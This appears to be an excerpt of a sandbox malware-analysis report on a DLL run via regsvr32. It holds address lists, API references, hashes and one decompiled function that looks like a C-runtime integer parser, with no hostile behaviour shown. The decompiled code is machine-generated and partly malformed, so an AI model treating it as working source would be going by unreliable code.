                                                                                                      0x7ff87c1030e3
                                                                                                      0x7ff87c1030ed
                                                                                                      0x7ff87c1030f5
                                                                                                      0x7ff87c1030ff
                                                                                                      0x7ff87c103109
                                                                                                      0x7ff87c103121
                                                                                                      0x7ff87c10312b
                                                                                                      0x7ff87c103143
                                                                                                      0x7ff87c103151
                                                                                                      0x7ff87c10315c
                                                                                                      0x7ff87c103162
                                                                                                      0x7ff87c103179
                                                                                                      0x7ff87c10317f
                                                                                                      0x7ff87c10318f
                                                                                                      0x7ff87c103196
                                                                                                      0x7ff87c1031a0
                                                                                                      0x7ff87c1031a8
                                                                                                      0x7ff87c1031b2
                                                                                                      0x7ff87c1031bc
                                                                                                      0x7ff87c1031d4
                                                                                                      0x7ff87c1031de
                                                                                                      0x7ff87c1031fb
                                                                                                      0x7ff87c103218

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10226B
                                                                                                        • Part of subcall function 00007FF87C102250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C10227C
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C102FF6
                                                                                                        • Part of subcall function 00007FF87C1018F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1018FE
                                                                                                        • Part of subcall function 00007FF87C103240: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C103310
                                                                                                        • Part of subcall function 00007FF87C103240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1033A8
                                                                                                        • Part of subcall function 00007FF87C103240: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1033C2
                                                                                                        • Part of subcall function 00007FF87C103240: char_traits.LIBCPMTD ref: 00007FF87C1033E2
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C1030A5
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1030E3
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1030FF
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C103121
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C103196
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1031B2
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1031D4
                                                                                                      • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C1031DE
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1031FB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$Mtx_guardMtx_guard::~_$EmptyQueue::Structured
                                                                                                      • String ID:
                                                                                                      • API String ID: 4284633421-0
                                                                                                      • Opcode ID: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
                                                                                                      • Instruction ID: 99f3f97b886b6f46a01a2084d584e9bf76adf73341b20d2dad25105d88d28756
                                                                                                      • Opcode Fuzzy Hash: f0975427a75d2d34f6acfc41e81dde88df83928edc9a6f38a481e59775bea447
                                                                                                      • Instruction Fuzzy Hash: D751C067A2CB8182DB60DB69E45136AA3A0FBC57C0F505136EBDD43B6ADF3CD4918B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 40%
                                                                                                      			E00007FF87FF87C10893C(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                      				void* _v64;
                                                                                                      				intOrPtr _v68;
                                                                                                      				intOrPtr _v72;
                                                                                                      				intOrPtr _v76;
                                                                                                      				intOrPtr _v80;
                                                                                                      				intOrPtr _v84;
                                                                                                      				intOrPtr _v88;
                                                                                                      				intOrPtr _v92;
                                                                                                      				intOrPtr _v96;
                                                                                                      				intOrPtr _v100;
                                                                                                      				intOrPtr _v104;
                                                                                                      				intOrPtr _v108;
                                                                                                      				intOrPtr _v112;
                                                                                                      				intOrPtr _v116;
                                                                                                      				intOrPtr _v120;
                                                                                                      				intOrPtr _v124;
                                                                                                      				intOrPtr _v128;
                                                                                                      				intOrPtr _v132;
                                                                                                      				intOrPtr _v136;
                                                                                                      				intOrPtr _v140;
                                                                                                      				intOrPtr _v144;
                                                                                                      				intOrPtr _v148;
                                                                                                      				intOrPtr _v152;
                                                                                                      				long long _v160;
                                                                                                      				long long _v168;
                                                                                                      				void* __rsi;
                                                                                                      				void* __rbp;
                                                                                                      				void* _t155;
                                                                                                      				void* _t185;
                                                                                                      				signed short _t199;
                                                                                                      				signed short _t200;
                                                                                                      				signed int _t201;
                                                                                                      				signed int _t250;
                                                                                                      				signed int _t252;
                                                                                                      				signed int _t254;
                                                                                                      				signed int _t255;
                                                                                                      				signed int _t258;
                                                                                                      				signed int _t261;
                                                                                                      				signed short* _t380;
                                                                                                      				signed short* _t381;
                                                                                                      				signed short* _t382;
                                                                                                      				signed short* _t384;
                                                                                                      				signed short** _t385;
                                                                                                      				long long _t386;
                                                                                                      				long long* _t389;
                                                                                                      				signed short* _t390;
                                                                                                      				long long* _t394;
                                                                                                      				long long* _t395;
                                                                                                      				long long* _t396;
                                                                                                      				signed short** _t397;
                                                                                                      				void* _t398;
                                                                                                      				void* _t399;
                                                                                                      				signed short* _t404;
                                                                                                      				signed short* _t405;
                                                                                                      				long long _t406;
                                                                                                      				signed short* _t407;
                                                                                                      				long long _t408;
                                                                                                      				intOrPtr _t409;
                                                                                                      
                                                                                                      				_t403 = __r8;
                                                                                                      				_t394 = __rdx;
                                                                                                      				_t386 = __rbx;
                                                                                                      				_a24 = __rbx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_t406 =  *((intOrPtr*)(__rdx));
                                                                                                      				r13d = 0;
                                                                                                      				_t255 = r9b & 0xffffffff;
                                                                                                      				r14d = r8d;
                                                                                                      				_v64 = _t406;
                                                                                                      				_t397 = __rdx;
                                                                                                      				if (_t406 != 0) goto 0x7c108987;
                                                                                                      				E00007FF87FF87C10B420(__rax);
                                                                                                      				 *__rax = 0x16;
                                                                                                      				E00007FF87FF87C109744();
                                                                                                      				goto 0x7c1089b9;
                                                                                                      				if (r14d == 0) goto 0x7c1089d1;
                                                                                                      				_t4 = _t403 - 2; // -2
                                                                                                      				if (_t4 - 0x22 <= 0) goto 0x7c1089d1;
                                                                                                      				_v160 = __rcx;
                                                                                                      				r9d = 0;
                                                                                                      				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                      				r8d = 0;
                                                                                                      				 *(__rcx + 0x2c) = 0x16;
                                                                                                      				_v168 = _t408;
                                                                                                      				E00007FF87FF87C109674(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
                                                                                                      				_t389 = _t397[1];
                                                                                                      				if (_t389 == 0) goto 0x7c10901d;
                                                                                                      				 *_t389 =  *_t397;
                                                                                                      				goto 0x7c10901d;
                                                                                                      				 *_t394 = _t406 + 2;
                                                                                                      				_t260 = r13d;
                                                                                                      				if ( *((intOrPtr*)(_t389 + 0x28)) != r13b) goto 0x7c1089fb;
                                                                                                      				0x7c109140();
                                                                                                      				goto 0x7c1089fb;
                                                                                                      				_t378 =  *_t397;
                                                                                                      				 *_t397 =  &(( *_t397)[1]);
                                                                                                      				if (E00007FF87FF87C10B244( *_t378 & 0xffff, 8, _t386, _t389) != 0) goto 0x7c1089ee;
                                                                                                      				_t257 =  !=  ? _t255 : _t255 | 0x00000002;
                                                                                                      				if ((0x0000fffd & _t386 - 0x0000002b) != 0) goto 0x7c108a32;
                                                                                                      				_t380 =  *_t397;
                                                                                                      				_t199 =  *_t380 & 0x0000ffff;
                                                                                                      				_t381 =  &(_t380[1]);
                                                                                                      				 *_t397 = _t381;
                                                                                                      				_a16 = 0xa70;
                                                                                                      				_v152 = 0xae6;
                                                                                                      				_v148 = 0xaf0;
                                                                                                      				_v144 = 0xb66;
                                                                                                      				r8d = 0x660;
                                                                                                      				_v140 = 0xb70;
                                                                                                      				_t20 = _t381 - 0x80; // 0x5e0
                                                                                                      				r9d = _t20;
                                                                                                      				_v136 = 0xc66;
                                                                                                      				r10d = 0x6f0;
                                                                                                      				_v132 = 0xc70;
                                                                                                      				r11d = 0x966;
                                                                                                      				_v128 = 0xce6;
                                                                                                      				_v124 = 0xcf0;
                                                                                                      				_v120 = 0xd66;
                                                                                                      				_v116 = 0xd70;
                                                                                                      				_v112 = 0xe50;
                                                                                                      				_v108 = 0xe5a;
                                                                                                      				_v104 = 0xed0;
                                                                                                      				_v100 = 0xeda;
                                                                                                      				_v96 = 0xf20;
                                                                                                      				_v92 = 0xf2a;
                                                                                                      				_v88 = 0x1040;
                                                                                                      				_v84 = 0x104a;
                                                                                                      				_v80 = 0x17e0;
                                                                                                      				_v76 = 0x17ea;
                                                                                                      				_v72 = 0x1810;
                                                                                                      				_v68 = 0xff1a;
                                                                                                      				if ((r14d & 0xffffffef) != 0) goto 0x7c108da0;
                                                                                                      				if (_t199 - 0x30 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x3a >= 0) goto 0x7c108b3e;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - 0xff10 >= 0) goto 0x7c108cdb;
                                                                                                      				if (_t199 - r8w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x66a >= 0) goto 0x7c108b66;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - r10w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x6fa >= 0) goto 0x7c108b85;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - r11w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x970 >= 0) goto 0x7c108ba4;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - r9w < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - 0x9f0 >= 0) goto 0x7c108bc3;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - (_t199 & 0x0000ffff) - r9d < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _a16 >= 0) goto 0x7c108be3;
                                                                                                      				goto 0x7c108cea;
                                                                                                      				if (_t199 - _v152 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v148 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v144 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v140 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v136 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v132 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v128 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v124 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v120 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v116 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v112 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v108 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v104 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v100 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v96 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v92 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v88 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v84 < 0) goto 0x7c108b34;
                                                                                                      				if (_t199 - _v80 < 0) goto 0x7c108cef;
                                                                                                      				if (_t199 - _v76 < 0) goto 0x7c108b34;
                                                                                                      				if ((_t199 & 0x0000ffff) - _v72 - 9 > 0) goto 0x7c108cef;
                                                                                                      				goto 0x7c108b34;
                                                                                                      				if (_t199 - _v68 >= 0) goto 0x7c108cef;
                                                                                                      				if ((_t199 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0x7c108d11;
                                                                                                      				_t64 = _t389 - 0x41; // -17
                                                                                                      				_t65 = _t389 - 0x61; // -49
                                                                                                      				_t155 = _t65;
                                                                                                      				if (_t64 - 0x19 <= 0) goto 0x7c108d06;
                                                                                                      				if (_t155 - 0x19 > 0) goto 0x7c108d91;
                                                                                                      				if (_t155 - 0x19 > 0) goto 0x7c108d0e;
                                                                                                      				_t66 = _t389 - 0x37; // -231
                                                                                                      				if (_t66 != 0) goto 0x7c108d91;
                                                                                                      				_t390 =  *_t397;
                                                                                                      				r9d = 0xffdf;
                                                                                                      				_t250 =  *_t390 & 0x0000ffff;
                                                                                                      				_t67 =  &(_t390[1]); // 0xffe1
                                                                                                      				_t404 = _t67;
                                                                                                      				 *_t397 = _t404;
                                                                                                      				_t68 = _t394 - 0x58; // 0x698
                                                                                                      				if ((r9w & _t68) == 0) goto 0x7c108d79;
                                                                                                      				 *_t397 = _t390;
                                                                                                      				_t159 =  !=  ? r14d : 8;
                                                                                                      				r14d =  !=  ? r14d : 8;
                                                                                                      				if (_t250 == 0) goto 0x7c108d71;
                                                                                                      				if ( *_t390 == _t250) goto 0x7c108d71;
                                                                                                      				E00007FF87FF87C10B420(_t381);
                                                                                                      				 *_t381 = 0x16;
                                                                                                      				E00007FF87FF87C109744();
                                                                                                      				r8d = 0x660;
                                                                                                      				r10d = 0x6f0;
                                                                                                      				r11d = 0x966;
                                                                                                      				goto 0x7c108da0;
                                                                                                      				r8d = 0x660;
                                                                                                      				goto 0x7c108da0;
                                                                                                      				_t200 =  *_t404 & 0x0000ffff;
                                                                                                      				_t71 =  &(_t404[1]); // 0xffe3
                                                                                                      				_t382 = _t71;
                                                                                                      				 *_t397 = _t382;
                                                                                                      				r8d = 0x660;
                                                                                                      				goto 0x7c108d96;
                                                                                                      				_t164 =  !=  ? r14d : 0xa;
                                                                                                      				r14d = 0xa;
                                                                                                      				_t165 = ( !=  ? r14d : 0xa) | 0xffffffff;
                                                                                                      				_t73 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                      				_t252 = (( !=  ? r14d : 0xa) | 0xffffffff) % r14d;
                                                                                                      				r12d = 0x30;
                                                                                                      				r15d = 0xff10;
                                                                                                      				r9d = 0xa / r14d;
                                                                                                      				if (_t200 - r12w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x3a >= 0) goto 0x7c108dd2;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - r15w >= 0) goto 0x7c108f5b;
                                                                                                      				if (_t200 - r8w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x66a >= 0) goto 0x7c108dfb;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - r10w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x6fa >= 0) goto 0x7c108e1a;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - r11w < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - 0x970 >= 0) goto 0x7c108e39;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - 0x9e6 < 0) goto 0x7c108f70;
                                                                                                      				_t76 =  &(_t382[5]); // 0x9f0
                                                                                                      				if (_t200 - _t76 >= 0) goto 0x7c108e59;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - 0xa66 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _a16 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v152 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v148 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v144 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v140 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v136 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v132 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v128 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v124 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v120 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v116 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v112 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v108 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v104 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v100 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v96 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v92 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v88 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v84 < 0) goto 0x7c108e4f;
                                                                                                      				if (_t200 - _v80 < 0) goto 0x7c108f70;
                                                                                                      				if (_t200 - _v76 < 0) goto 0x7c108e4f;
                                                                                                      				if ((_t200 & 0x0000ffff) - _v72 - 9 > 0) goto 0x7c108f70;
                                                                                                      				goto 0x7c108f6b;
                                                                                                      				if (_t200 - _v68 >= 0) goto 0x7c108f70;
                                                                                                      				if ((_t200 & 0x0000ffff) - r15d != 0xffffffff) goto 0x7c108f93;
                                                                                                      				_t100 = _t390 - 0x41; // -65
                                                                                                      				_t101 = _t390 - 0x61; // -97
                                                                                                      				_t185 = _t101;
                                                                                                      				if (_t100 - 0x19 <= 0) goto 0x7c108f83;
                                                                                                      				if (_t185 - 0x19 > 0) goto 0x7c108f90;
                                                                                                      				if (_t185 - 0x19 > 0) goto 0x7c108f8b;
                                                                                                      				goto 0x7c108f93;
                                                                                                      				_t405 =  *_t397;
                                                                                                      				if (((_t200 & 0x0000ffff) + 0x1ffffffa9 | 0xffffffff) - r14d >= 0) goto 0x7c108fd7;
                                                                                                      				_t201 =  *_t405 & 0x0000ffff;
                                                                                                      				_t254 = _t382 + _t390;
                                                                                                      				_t261 = _t254;
                                                                                                      				_t107 =  &(_t405[1]); // 0x2
                                                                                                      				r8d = 0x660;
                                                                                                      				 *_t397 = _t107;
                                                                                                      				_t258 = ( !=  ? _t255 : _t255 | 0x00000002) | (r13d & 0xffffff00 | _t254 - r13d * r14d > 0x00000000 | r13d & 0xffffff00 | _t260 - r9d > 0x00000000) << 0x00000002 | 0x00000008;
                                                                                                      				goto 0x7c108db7;
                                                                                                      				_t409 = _a8;
                                                                                                      				_t109 = _t405 - 2; // -2
                                                                                                      				_t384 = _t109;
                                                                                                      				_t407 = _v64;
                                                                                                      				 *_t397 = _t384;
                                                                                                      				if (_t201 == 0) goto 0x7c109008;
                                                                                                      				if ( *_t384 == _t201) goto 0x7c109008;
                                                                                                      				E00007FF87FF87C10B420(_t384);
                                                                                                      				 *_t384 = 0x16;
                                                                                                      				E00007FF87FF87C109744();
                                                                                                      				if ((sil & 0x00000008) != 0) goto 0x7c109024;
                                                                                                      				_t385 = _t397[1];
                                                                                                      				 *_t397 = _t407;
                                                                                                      				if (_t385 == 0) goto 0x7c10901d;
                                                                                                      				 *_t385 = _t407;
                                                                                                      				goto 0x7c1090a8;
                                                                                                      				r8d = 0x80000000;
                                                                                                      				_t114 = _t405 - 1; // -1
                                                                                                      				r9d = _t114;
                                                                                                      				if ((sil & 0x00000004) != 0) goto 0x7c10904c;
                                                                                                      				if ((sil & 0x00000001) == 0) goto 0x7c10908f;
                                                                                                      				if ((sil & 0x00000002) == 0) goto 0x7c109047;
                                                                                                      				if (_t261 - r8d <= 0) goto 0x7c109095;
                                                                                                      				goto 0x7c10904c;
                                                                                                      				if (_t261 - r9d <= 0) goto 0x7c109097;
                                                                                                      				 *((char*)(_t409 + 0x30)) = 1;
                                                                                                      				 *((intOrPtr*)(_t409 + 0x2c)) = 0x22;
                                                                                                      				if ((_t258 & 0x00000001) != 0) goto 0x7c109067;
                                                                                                      				goto 0x7c109097;
                                                                                                      				_t395 = _t397[1];
                                                                                                      				if ((_t258 & 0x00000002) == 0) goto 0x7c10907f;
                                                                                                      				if (_t395 == 0) goto 0x7c10907a;
                                                                                                      				 *_t395 =  *_t397;
                                                                                                      				goto 0x7c1090a8;
                                                                                                      				if (_t395 == 0) goto 0x7c10908a;
                                                                                                      				 *_t395 =  *_t397;
                                                                                                      				goto 0x7c1090a8;
                                                                                                      				if ((sil & 0x00000002) == 0) goto 0x7c109097;
                                                                                                      				_t396 = _t397[1];
                                                                                                      				if (_t396 == 0) goto 0x7c1090a6;
                                                                                                      				 *_t396 =  *_t397;
                                                                                                      				return  ~(_t261 | 0xffffffff);
                                                                                                      			}





























































                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c10893c
                                                                                                      0x7ff87c108941
                                                                                                      0x7ff87c108958
                                                                                                      0x7ff87c10895b
                                                                                                      0x7ff87c10895e
                                                                                                      0x7ff87c108962
                                                                                                      0x7ff87c108965
                                                                                                      0x7ff87c10896d
                                                                                                      0x7ff87c108973
                                                                                                      0x7ff87c108975
                                                                                                      0x7ff87c10897a
                                                                                                      0x7ff87c108980
                                                                                                      0x7ff87c108985
                                                                                                      0x7ff87c10898a
                                                                                                      0x7ff87c10898c
                                                                                                      0x7ff87c108993
                                                                                                      0x7ff87c108995
                                                                                                      0x7ff87c10899a
                                                                                                      0x7ff87c10899d
                                                                                                      0x7ff87c1089a1
                                                                                                      0x7ff87c1089a4
                                                                                                      0x7ff87c1089af
                                                                                                      0x7ff87c1089b4
                                                                                                      0x7ff87c1089b9
                                                                                                      0x7ff87c1089c0
                                                                                                      0x7ff87c1089c9
                                                                                                      0x7ff87c1089cc
                                                                                                      0x7ff87c1089db
                                                                                                      0x7ff87c1089de
                                                                                                      0x7ff87c1089e5
                                                                                                      0x7ff87c1089e7
                                                                                                      0x7ff87c1089ec
                                                                                                      0x7ff87c1089ee
                                                                                                      0x7ff87c1089f8
                                                                                                      0x7ff87c108a0a
                                                                                                      0x7ff87c108a1a
                                                                                                      0x7ff87c108a23
                                                                                                      0x7ff87c108a25
                                                                                                      0x7ff87c108a28
                                                                                                      0x7ff87c108a2b
                                                                                                      0x7ff87c108a2f
                                                                                                      0x7ff87c108a32
                                                                                                      0x7ff87c108a42
                                                                                                      0x7ff87c108a4f
                                                                                                      0x7ff87c108a5c
                                                                                                      0x7ff87c108a64
                                                                                                      0x7ff87c108a6a
                                                                                                      0x7ff87c108a72
                                                                                                      0x7ff87c108a72
                                                                                                      0x7ff87c108a76
                                                                                                      0x7ff87c108a7e
                                                                                                      0x7ff87c108a84
                                                                                                      0x7ff87c108a8c
                                                                                                      0x7ff87c108a92
                                                                                                      0x7ff87c108a9a
                                                                                                      0x7ff87c108aa2
                                                                                                      0x7ff87c108aaa
                                                                                                      0x7ff87c108ab2
                                                                                                      0x7ff87c108aba
                                                                                                      0x7ff87c108ac2
                                                                                                      0x7ff87c108aca
                                                                                                      0x7ff87c108ad2
                                                                                                      0x7ff87c108ada
                                                                                                      0x7ff87c108ae2
                                                                                                      0x7ff87c108aea
                                                                                                      0x7ff87c108af2
                                                                                                      0x7ff87c108afa
                                                                                                      0x7ff87c108b02
                                                                                                      0x7ff87c108b0d
                                                                                                      0x7ff87c108b1f
                                                                                                      0x7ff87c108b28
                                                                                                      0x7ff87c108b32
                                                                                                      0x7ff87c108b39
                                                                                                      0x7ff87c108b41
                                                                                                      0x7ff87c108b4b
                                                                                                      0x7ff87c108b59
                                                                                                      0x7ff87c108b61
                                                                                                      0x7ff87c108b6a
                                                                                                      0x7ff87c108b78
                                                                                                      0x7ff87c108b80
                                                                                                      0x7ff87c108b89
                                                                                                      0x7ff87c108b97
                                                                                                      0x7ff87c108b9f
                                                                                                      0x7ff87c108ba8
                                                                                                      0x7ff87c108bb6
                                                                                                      0x7ff87c108bbe
                                                                                                      0x7ff87c108bc6
                                                                                                      0x7ff87c108bd4
                                                                                                      0x7ff87c108bde
                                                                                                      0x7ff87c108bea
                                                                                                      0x7ff87c108bf5
                                                                                                      0x7ff87c108c02
                                                                                                      0x7ff87c108c0d
                                                                                                      0x7ff87c108c1a
                                                                                                      0x7ff87c108c25
                                                                                                      0x7ff87c108c32
                                                                                                      0x7ff87c108c3d
                                                                                                      0x7ff87c108c4a
                                                                                                      0x7ff87c108c55
                                                                                                      0x7ff87c108c62
                                                                                                      0x7ff87c108c6d
                                                                                                      0x7ff87c108c7a
                                                                                                      0x7ff87c108c81
                                                                                                      0x7ff87c108c8e
                                                                                                      0x7ff87c108c95
                                                                                                      0x7ff87c108ca2
                                                                                                      0x7ff87c108ca9
                                                                                                      0x7ff87c108cb6
                                                                                                      0x7ff87c108cbd
                                                                                                      0x7ff87c108cd4
                                                                                                      0x7ff87c108cd6
                                                                                                      0x7ff87c108ce3
                                                                                                      0x7ff87c108ced
                                                                                                      0x7ff87c108cf2
                                                                                                      0x7ff87c108cf8
                                                                                                      0x7ff87c108cf8
                                                                                                      0x7ff87c108cfb
                                                                                                      0x7ff87c108d00
                                                                                                      0x7ff87c108d09
                                                                                                      0x7ff87c108d0e
                                                                                                      0x7ff87c108d13
                                                                                                      0x7ff87c108d15
                                                                                                      0x7ff87c108d18
                                                                                                      0x7ff87c108d1e
                                                                                                      0x7ff87c108d21
                                                                                                      0x7ff87c108d21
                                                                                                      0x7ff87c108d25
                                                                                                      0x7ff87c108d28
                                                                                                      0x7ff87c108d2f
                                                                                                      0x7ff87c108d34
                                                                                                      0x7ff87c108d3c
                                                                                                      0x7ff87c108d40
                                                                                                      0x7ff87c108d46
                                                                                                      0x7ff87c108d4b
                                                                                                      0x7ff87c108d4d
                                                                                                      0x7ff87c108d52
                                                                                                      0x7ff87c108d58
                                                                                                      0x7ff87c108d5d
                                                                                                      0x7ff87c108d63
                                                                                                      0x7ff87c108d69
                                                                                                      0x7ff87c108d6f
                                                                                                      0x7ff87c108d71
                                                                                                      0x7ff87c108d77
                                                                                                      0x7ff87c108d79
                                                                                                      0x7ff87c108d7d
                                                                                                      0x7ff87c108d7d
                                                                                                      0x7ff87c108d81
                                                                                                      0x7ff87c108d84
                                                                                                      0x7ff87c108d8f
                                                                                                      0x7ff87c108d99
                                                                                                      0x7ff87c108d9d
                                                                                                      0x7ff87c108da2
                                                                                                      0x7ff87c108da5
                                                                                                      0x7ff87c108da5
                                                                                                      0x7ff87c108da8
                                                                                                      0x7ff87c108dae
                                                                                                      0x7ff87c108db4
                                                                                                      0x7ff87c108dbb
                                                                                                      0x7ff87c108dc5
                                                                                                      0x7ff87c108dcd
                                                                                                      0x7ff87c108dd6
                                                                                                      0x7ff87c108de0
                                                                                                      0x7ff87c108dee
                                                                                                      0x7ff87c108df6
                                                                                                      0x7ff87c108dff
                                                                                                      0x7ff87c108e0d
                                                                                                      0x7ff87c108e15
                                                                                                      0x7ff87c108e1e
                                                                                                      0x7ff87c108e2c
                                                                                                      0x7ff87c108e34
                                                                                                      0x7ff87c108e41
                                                                                                      0x7ff87c108e47
                                                                                                      0x7ff87c108e4d
                                                                                                      0x7ff87c108e54
                                                                                                      0x7ff87c108e61
                                                                                                      0x7ff87c108e6f
                                                                                                      0x7ff87c108e78
                                                                                                      0x7ff87c108e83
                                                                                                      0x7ff87c108e8c
                                                                                                      0x7ff87c108e97
                                                                                                      0x7ff87c108ea0
                                                                                                      0x7ff87c108eab
                                                                                                      0x7ff87c108eb4
                                                                                                      0x7ff87c108ebf
                                                                                                      0x7ff87c108ec8
                                                                                                      0x7ff87c108ed3
                                                                                                      0x7ff87c108ee0
                                                                                                      0x7ff87c108eeb
                                                                                                      0x7ff87c108ef8
                                                                                                      0x7ff87c108eff
                                                                                                      0x7ff87c108f0c
                                                                                                      0x7ff87c108f13
                                                                                                      0x7ff87c108f20
                                                                                                      0x7ff87c108f27
                                                                                                      0x7ff87c108f34
                                                                                                      0x7ff87c108f3b
                                                                                                      0x7ff87c108f52
                                                                                                      0x7ff87c108f59
                                                                                                      0x7ff87c108f63
                                                                                                      0x7ff87c108f6e
                                                                                                      0x7ff87c108f73
                                                                                                      0x7ff87c108f79
                                                                                                      0x7ff87c108f79
                                                                                                      0x7ff87c108f7c
                                                                                                      0x7ff87c108f81
                                                                                                      0x7ff87c108f86
                                                                                                      0x7ff87c108f8e
                                                                                                      0x7ff87c108f93
                                                                                                      0x7ff87c108f99
                                                                                                      0x7ff87c108f9b
                                                                                                      0x7ff87c108fa5
                                                                                                      0x7ff87c108fb6
                                                                                                      0x7ff87c108fbd
                                                                                                      0x7ff87c108fc4
                                                                                                      0x7ff87c108fcd
                                                                                                      0x7ff87c108fd0
                                                                                                      0x7ff87c108fd2
                                                                                                      0x7ff87c108fd7
